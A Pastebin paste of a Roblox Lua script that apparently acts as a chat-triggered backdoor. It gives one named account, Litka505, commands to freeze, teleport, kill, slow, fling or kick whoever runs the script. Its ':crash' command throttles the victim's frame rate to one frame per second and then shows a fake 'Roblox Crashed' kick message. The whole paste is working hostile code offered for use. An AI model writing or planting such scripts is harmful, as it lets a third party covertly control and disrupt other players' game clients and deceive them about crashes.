Advertisement
justneed

Control

Sep 10th, 2024 (edited)
401
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.16 KB | Gaming | 0 0
  1. local user = game.Players.LocalPlayer.Character.HumanoidRootPart
  2. local me = game.Players.Litka505
  3.  
  4. me.Chatted:connect(function(cht)
  5.     if cht == ":freeze ." then
  6.         user.Anchored = true
  7.     end
  8. end)
  9.  
  10. me.Chatted:connect(function(cht)
  11.     if cht == ":unfreeze ." then
  12.         user.Anchored = false
  13.     end
  14. end)
  15.  
  16. me.Chatted:connect(function(cht)
  17.     if cht == ":bring ." then
  18.         user.CFrame = me.Character.HumanoidRootPart.CFrame
  19.     end
  20. end)
  21.  
  22. me.Chatted:connect(function(cht)
  23.     if cht == ":kick ." then
  24.         game.Players.LocalPlayer:Kick("You got kicked from this experience.")
  25.     end
  26. end)
  27.  
  28. me.Chatted:connect(function(cht)
  29.     if cht == ":ban ." then
  30.         game.Players.LocalPlayer:Kick("You are banned!")
  31.     end
  32. end)
  33.  
  34. me.Chatted:connect(function(cht)
  35.     if cht == ":fling ." then
  36.         user.CFrame = CFrame.new(-64.4950714, 633.052734, 104.106598, -0.921858728, -0.378823459, 0.0816653818, -1.67315939e-10, 0.210735187, 0.977543235, -0.387526065, 0.901156723, -0.1942681)
  37.     end
  38. end)
  39.  
  40. me.Chatted:connect(function(cht)
  41.     if cht == ":kill ." then
  42.         game.Players.LocalPlayer.Character.Humanoid.Health = 0
  43.     end
  44. end)
  45.  
  46. me.Chatted:connect(function(cht)
  47.     if cht == ":slow ." then
  48.         game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 5
  49.     end
  50. end)
  51.  
  52. me.Chatted:connect(function(cht)
  53.     if cht == ":unslow ." then
  54.         game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
  55.     end
  56. end)
  57.  
  58. me.Chatted:connect(function(cht)
  59.     if cht == ":sit ." then
  60.         game.Players.LocalPlayer.Character.Humanoid.Sit = true
  61.     end
  62. end)
  63.  
  64. me.Chatted:connect(function(cht)
  65.     if cht == ":unsit ." then
  66.         game.Players.LocalPlayer.Character.Humanoid.Sit = false
  67.     end
  68. end)
  69.  
  70. me.Chatted:connect(function(cht)
  71.     if cht == ":crash ." then
  72.         local RunService = game:GetService("RunService")
  73.  
  74. local TARGET_FRAME_RATE = 1
  75.  
  76. local frameStart = os.clock()
  77.  
  78. RunService.PreSimulation:Connect(function()
  79.     while os.clock() - frameStart < 1 / TARGET_FRAME_RATE do
  80.         -- We do nothing until the target time has elapsed
  81.     end
  82.  
  83.     -- Mark the start of the next frame right before this one is rendered
  84.     frameStart = os.clock()
  85. end)
  86.             wait(2)
  87.             game.Players.LocalPlayer:Kick("Roblox Crashed")
  88.     end
  89. end)
  90.  
  91. print(":D")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement